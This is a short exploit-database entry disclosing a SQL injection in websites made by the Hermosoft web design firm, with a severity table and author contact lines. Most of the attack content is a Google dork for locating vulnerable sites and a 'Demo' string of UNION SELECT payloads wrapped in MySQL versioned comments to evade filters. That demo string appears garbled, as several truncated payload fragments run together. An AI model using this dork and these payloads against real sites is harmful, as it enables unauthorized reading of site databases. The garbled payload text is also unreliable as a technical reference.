Hermosoft Sql Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 Not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2021-08-17
CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 0.37 0.8812

CVSS vector description

#Exploit Title: Hermosoft Sql Injection Vulnerability
#Date: 2021-08-16
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed and developed by web design Dubai, Hermosoft."
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed and developed by web design Dubai, Hermosoft."

### Demo :,2,3,4,5,6,7,version(),9,10,11--*!12345union*/%20select%201,version(),3,4,5,6,7,8,9,10,11--&backstatus=1*!12345union*/%20select%201,version(),3,4,5,6,7--*!50000union*/%20select%201,2,version(),4,5,6,7,8,9--+&name=Golden%20Achievement%20Awards%201st%20Edition-2012

#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]

